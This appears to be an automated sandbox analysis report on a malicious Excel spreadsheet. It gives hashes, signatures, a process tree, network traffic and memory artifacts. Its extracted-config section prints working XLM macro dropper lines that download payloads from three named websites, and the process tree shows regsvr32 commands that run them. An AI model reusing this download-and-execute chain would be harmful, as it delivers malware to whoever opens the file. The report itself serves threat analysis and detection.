Analysis

  • max time kernel
    133s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/11/2024, 00:44 UTC

General

  • Target

    7a7688cd6f7077b47529fd6263bcc395b91b0966492aa71fad97580edfa8f862.xls

  • Size

    71KB

  • MD5

    7d7d21d0c976b9711aa88f72bacc8f13

  • SHA1

    544b7bd2a8422f013cdd5dd85d679fbf1d4ca486

  • SHA256

    7a7688cd6f7077b47529fd6263bcc395b91b0966492aa71fad97580edfa8f862

  • SHA512

    df1c0634912caff5ad17ef2a1ed47a2f6c2a7348887cff482ce089aff883c1f08d7c8b679709243aa33ed36b491faf3844488c1e4d5fde5bb27d534cff5acfe8

  • SSDEEP

    1536:DhKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+gH+hDcnTLiQrRTZws8EYO:FKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMv

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://papillonweb.fr/wp-content/G8z08q0mj/", "..\usoiy1.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://brennanasia.com/images/6IwPBHbnUvfgugV1b/", "..\usoiy2.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/", "..\usoiy3.ocx")
URLs
xlm40.dropper

https://papillonweb.fr/wp-content/G8z08q0mj/

xlm40.dropper

http://brennanasia.com/images/6IwPBHbnUvfgugV1b/

xlm40.dropper

https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\7a7688cd6f7077b47529fd6263bcc395b91b0966492aa71fad97580edfa8f862.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4148
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\usoiy1.ocx
      2⤵
      • Process spawned unexpected child process
      PID:1884
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\usoiy2.ocx
      2⤵
      • Process spawned unexpected child process
      PID:2964
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\usoiy3.ocx
      2⤵
      • Process spawned unexpected child process
      PID:4272

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    uks-azsc-000.roaming.officeapps.live.com
    uks-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    IN A
    52.109.28.47
  • flag-gb
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    EXCEL.EXE
    Remote address:
    52.109.28.47:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_127
    X-OfficeVersion: 16.0.18311.30577
    X-OfficeCluster: uks-000.roaming.officeapps.live.com
    Content-Security-Policy-Report-Only: script-src 'nonce-roIIAWx80JGbpbz4tFlo1d1q+EF5LYX39+hJcu+gutEX84xniPuRhC5QZ++ay3A6SxSdDTyXsrP9LNFkdrVNtQ54WNN1l08cJHNg5caby2gumJza/oBittXfBnxihn9aK3O0YF5s7ULnly2xjeeeIU+h32uGjnsm4no3YmeBt4E=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
    X-CorrelationId: 09390924-e62c-40a6-87e3-53408f816947
    X-Powered-By: ASP.NET
    Date: Thu, 21 Nov 2024 00:44:41 GMT
    Content-Length: 654
  • flag-us
    DNS
    papillonweb.fr
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    papillonweb.fr
    IN A
    Response
    papillonweb.fr
    IN A
    163.172.100.17
  • flag-fr
    GET
    https://papillonweb.fr/wp-content/G8z08q0mj/
    EXCEL.EXE
    Remote address:
    163.172.100.17:443
    Request
    GET /wp-content/G8z08q0mj/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: papillonweb.fr
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 21 Nov 2024 00:44:42 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Set-Cookie: PHPSESSID=5cngjgsmu6rsd849gt4a78puv3; path=/; secure; HttpOnly
    Vary: Accept-Encoding
    Location: https://papillonweb.fr
    Referrer-Policy: no-referrer-when-downgrade
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-fr
    GET
    https://papillonweb.fr/
    EXCEL.EXE
    Remote address:
    163.172.100.17:443
    Request
    GET / HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: papillonweb.fr
    Connection: Keep-Alive
    Cookie: PHPSESSID=5cngjgsmu6rsd849gt4a78puv3
    Response
    HTTP/1.1 200 OK
    Date: Thu, 21 Nov 2024 00:44:43 GMT
    Server: Apache
    Vary: Accept-Encoding,Cookie
    Last-Modified: Thu, 14 Nov 2024 21:19:05 GMT
    ETag: "60a6-626e6000c52bf"
    Accept-Ranges: bytes
    Content-Length: 24742
    Referrer-Policy: no-referrer-when-downgrade
    Pragma: public
    Cache-Control: max-age=3600, public
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Content-Encoding: gzip
  • flag-us
    DNS
    47.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    47.28.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    47.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    47.28.109.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    17.100.172.163.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.100.172.163.in-addr.arpa
    IN PTR
    Response
    17.100.172.163.in-addr.arpa
    IN PTR
    papillonwebclients ipsolutionfr
  • flag-us
    DNS
    17.100.172.163.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.100.172.163.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    74.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    74.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
    Response
    168.245.100.95.in-addr.arpa
    IN PTR
    a95-100-245-168.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    brennanasia.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    brennanasia.com
    IN A
    Response
    brennanasia.com
    IN A
    103.204.130.53
  • flag-sg
    GET
    http://brennanasia.com/images/6IwPBHbnUvfgugV1b/
    EXCEL.EXE
    Remote address:
    103.204.130.53:80
    Request
    GET /images/6IwPBHbnUvfgugV1b/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: brennanasia.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 21 Nov 2024 00:44:44 GMT
    server: LiteSpeed
    strict-transport-security: max-age=63072000; includeSubDomains
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
  • flag-us
    DNS
    estacioesportivavilanovailageltru.cat
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    estacioesportivavilanovailageltru.cat
    IN A
    Response
    estacioesportivavilanovailageltru.cat
    IN A
    104.21.93.247
    estacioesportivavilanovailageltru.cat
    IN A
    172.67.216.229
  • flag-us
    DNS
    estacioesportivavilanovailageltru.cat
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    estacioesportivavilanovailageltru.cat
    IN A
  • flag-us
    DNS
    53.130.204.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.130.204.103.in-addr.arpa
    IN PTR
    Response
    53.130.204.103.in-addr.arpa
    IN PTR
    server2.dagadudigital.com
  • flag-us
    DNS
    53.130.204.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.130.204.103.in-addr.arpa
    IN PTR
  • flag-us
    GET
    https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/
    EXCEL.EXE
    Remote address:
    104.21.93.247:443
    Request
    GET /tmp/IgSyqwgJmE/ HTTP/2.0
    host: estacioesportivavilanovailageltru.cat
    accept: */*
    ua-cpu: AMD64
    accept-encoding: gzip, deflate
    user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/2.0 301
    date: Thu, 21 Nov 2024 00:44:48 GMT
    content-type: text/html; charset=UTF-8
    location: https://parchiavventurasardegna.it/post/spectrums-california-debacle-outage-highlights-need-for
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0
    x-redirect-by: WordPress
    x-turbo-charged-by: LiteSpeed
    cf-cache-status: DYNAMIC
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFGp4aWtxVGd%2B3KlWnra%2FTFtG2ceVlMajqw%2FyZSEUjIxdRteWUdGHWd6tRH%2FMF4SDk0%2Fy7jsqN6jEwMf%2BKPOuyYumYhUlPYO4evrzUPN8iKb0V2LUFpwar4VYEZ1KYER2HbQe5mNhdweJYylzFS1qk5%2F1FbXnPBF"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    server: cloudflare
    cf-ray: 8e5ca73a38276382-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=30041&sent=8&recv=13&lost=0&retrans=1&sent_bytes=3478&recv_bytes=665&delivery_rate=146882&cwnd=255&unsent_bytes=0&cid=79917825647abde7&ts=1339&x=0"
  • flag-us
    DNS
    c.pki.goog
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.200.3
  • flag-gb
    GET
    http://c.pki.goog/r/gsr1.crl
    EXCEL.EXE
    Remote address:
    142.250.200.3:80
    Request
    GET /r/gsr1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 1739
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Thu, 21 Nov 2024 00:14:01 GMT
    Expires: Thu, 21 Nov 2024 01:04:01 GMT
    Cache-Control: public, max-age=3000
    Age: 1845
    Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
  • flag-gb
    GET
    http://c.pki.goog/r/r4.crl
    EXCEL.EXE
    Remote address:
    142.250.200.3:80
    Request
    GET /r/r4.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 436
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Thu, 21 Nov 2024 00:27:47 GMT
    Expires: Thu, 21 Nov 2024 01:17:47 GMT
    Cache-Control: public, max-age=3000
    Age: 1020
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
  • flag-us
    DNS
    247.93.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    247.93.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    3.200.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    3.200.250.142.in-addr.arpa
    IN PTR
    Response
    3.200.250.142.in-addr.arpa
    IN PTR
    lhr48s29-in-f3.1e100.net
  • flag-us
    DNS
    parchiavventurasardegna.it
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    parchiavventurasardegna.it
    IN A
    Response
    parchiavventurasardegna.it
    IN A
    104.21.90.214
    parchiavventurasardegna.it
    IN A
    172.67.161.108
  • flag-us
    GET
    https://parchiavventurasardegna.it/post/spectrums-california-debacle-outage-highlights-need-for
    EXCEL.EXE
    Remote address:
    104.21.90.214:443
    Request
    GET /post/spectrums-california-debacle-outage-highlights-need-for HTTP/2.0
    host: parchiavventurasardegna.it
    accept: */*
    ua-cpu: AMD64
    accept-encoding: gzip, deflate
    user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/2.0 200
    date: Thu, 21 Nov 2024 00:44:48 GMT
    content-type: text/html; charset=UTF-8
    x-powered-by: Express
    cf-cache-status: DYNAMIC
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sfJNWQ4qflAuaeubbIKVOUc1pcXCenCpwQVdy1LQO6ClDmiXQbC%2Bo3FFTctFZyzpDCcOsT0drQXiMsQbXYJ5OaVJYjyWMvNEHDQndY5zRo8TIrc7FAAnUCnn5Ins5Xe1P4AUhUUfuAtJ4pXIw%3D%3D"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    server: cloudflare
    cf-ray: 8e5ca7424ba1943c-LHR
    content-encoding: gzip
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=33072&sent=8&recv=12&lost=0&retrans=0&sent_bytes=3440&recv_bytes=677&delivery_rate=86265&cwnd=255&unsent_bytes=0&cid=6584ddeb60037f60&ts=526&x=0"
  • flag-us
    DNS
    214.90.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    214.90.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 52.109.28.47:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    EXCEL.EXE
    2.0kB
    8.2kB
    13
    11

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 163.172.100.17:443
    https://papillonweb.fr/
    tls, http
    EXCEL.EXE
    3.4kB
    31.4kB
    37
    30

    HTTP Request

    GET https://papillonweb.fr/wp-content/G8z08q0mj/

    HTTP Response

    301

    HTTP Request

    GET https://papillonweb.fr/

    HTTP Response

    200
  • 103.204.130.53:80
    http://brennanasia.com/images/6IwPBHbnUvfgugV1b/
    http
    EXCEL.EXE
    642 B
    1.8kB
    7
    4

    HTTP Request

    GET http://brennanasia.com/images/6IwPBHbnUvfgugV1b/

    HTTP Response

    404
  • 104.21.93.247:443
    https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/
    tls, http2
    EXCEL.EXE
    1.5kB
    4.8kB
    18
    12

    HTTP Request

    GET https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/

    HTTP Response

    301
  • 142.250.200.3:80
    http://c.pki.goog/r/r4.crl
    http
    EXCEL.EXE
    602 B
    3.9kB
    8
    6

    HTTP Request

    GET http://c.pki.goog/r/gsr1.crl

    HTTP Response

    200

    HTTP Request

    GET http://c.pki.goog/r/r4.crl

    HTTP Response

    200
  • 104.21.90.214:443
    https://parchiavventurasardegna.it/post/spectrums-california-debacle-outage-highlights-need-for
    tls, http2
    EXCEL.EXE
    2.2kB
    21.2kB
    33
    28

    HTTP Request

    GET https://parchiavventurasardegna.it/post/spectrums-california-debacle-outage-highlights-need-for

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    EXCEL.EXE
    73 B
    244 B
    1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.28.47

  • 8.8.8.8:53
    papillonweb.fr
    dns
    EXCEL.EXE
    60 B
    76 B
    1
    1

    DNS Request

    papillonweb.fr

    DNS Response

    163.172.100.17

  • 8.8.8.8:53
    47.28.109.52.in-addr.arpa
    dns
    142 B
    145 B
    2
    1

    DNS Request

    47.28.109.52.in-addr.arpa

    DNS Request

    47.28.109.52.in-addr.arpa

  • 8.8.8.8:53
    17.100.172.163.in-addr.arpa
    dns
    146 B
    120 B
    2
    1

    DNS Request

    17.100.172.163.in-addr.arpa

    DNS Request

    17.100.172.163.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    146 B
    144 B
    2
    1

    DNS Request

    95.221.229.192.in-addr.arpa

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    74.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    74.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    168.245.100.95.in-addr.arpa
    dns
    146 B
    139 B
    2
    1

    DNS Request

    168.245.100.95.in-addr.arpa

    DNS Request

    168.245.100.95.in-addr.arpa

  • 8.8.8.8:53
    brennanasia.com
    dns
    EXCEL.EXE
    61 B
    77 B
    1
    1

    DNS Request

    brennanasia.com

    DNS Response

    103.204.130.53

  • 8.8.8.8:53
    estacioesportivavilanovailageltru.cat
    dns
    EXCEL.EXE
    166 B
    115 B
    2
    1

    DNS Request

    estacioesportivavilanovailageltru.cat

    DNS Request

    estacioesportivavilanovailageltru.cat

    DNS Response

    104.21.93.247
    172.67.216.229

  • 8.8.8.8:53
    53.130.204.103.in-addr.arpa
    dns
    146 B
    112 B
    2
    1

    DNS Request

    53.130.204.103.in-addr.arpa

    DNS Request

    53.130.204.103.in-addr.arpa

  • 8.8.8.8:53
    c.pki.goog
    dns
    EXCEL.EXE
    56 B
    107 B
    1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.200.3

  • 8.8.8.8:53
    247.93.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    247.93.21.104.in-addr.arpa

  • 8.8.8.8:53
    3.200.250.142.in-addr.arpa
    dns
    72 B
    110 B
    1
    1

    DNS Request

    3.200.250.142.in-addr.arpa

  • 8.8.8.8:53
    parchiavventurasardegna.it
    dns
    EXCEL.EXE
    72 B
    104 B
    1
    1

    DNS Request

    parchiavventurasardegna.it

    DNS Response

    104.21.90.214
    172.67.161.108

  • 8.8.8.8:53
    214.90.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    214.90.21.104.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
    160 B
    1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    43.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    568bada6e136664b88648eeeec377273

    SHA1

    6dba6ede00426a36d60038d2244f9fdfde5ac098

    SHA256

    5f236701114704eae6433b0db66ecc0a05e4c9144337513f8d14f2320e7bda1a

    SHA512

    23a847859ca0ba4c3f233eee4f9dac5a86aeba09e9d5266379bfa7bdd1b953aead00a5be2c25759631517ec96cb7fe909d2d42e04dc095824c6f925f1cccefc7

  • C:\Users\Admin\usoiy1.ocx

    Filesize

    111KB

    MD5

    a32ddff026d0c45aec7bf4c84fb00e6f

    SHA1

    377fa6800165a19b9f2b760ba1b970ab3c09d3ae

    SHA256

    79a01b0fa26cfd15bd528c57d32d2bb6e6a984f2b0f4d95d7b24dfcf1dcb89e9

    SHA512

    de15e922e1bf7c43e73050acaedaa1b9c7978cf3ac29ccd24ce114617a93cd6d6fa035f9226bd32fa2c72892ffb8fdf92665b322e90ffeb82d85f306ee30cf9e

  • C:\Users\Admin\usoiy3.ocx

    Filesize

    75KB

    MD5

    e4841206fed7dcc05abeb2543cc24acb

    SHA1

    1a7ee4436d935c1aab414653dd81388059b2c948

    SHA256

    a1d9b74e0513145be6e2aa9d0cc6ed8eb75a64b67c7b65e5c351212df7ed46df

    SHA512

    cd9235ac4ab25c6c55d03bf8a59b7e248179da3f1469974f48e1c1e783e6194e2c7f9bc925398ad256b36dd93c0ec59cc2d614daca62b9579652bfc83978c8b1

  • memory/4148-10-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-9-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-7-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-8-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB

  • memory/4148-5-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB

  • memory/4148-6-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-11-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-12-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-13-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

    Filesize

    64KB

  • memory/4148-0-0x00007FFE4E96D000-0x00007FFE4E96E000-memory.dmp

    Filesize

    4KB

  • memory/4148-14-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

    Filesize

    64KB

  • memory/4148-4-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-15-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-16-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-1-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB

  • memory/4148-40-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-42-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-41-0x00007FFE4E96D000-0x00007FFE4E96E000-memory.dmp

    Filesize

    4KB

  • memory/4148-2-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB

  • memory/4148-48-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/4148-3-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB
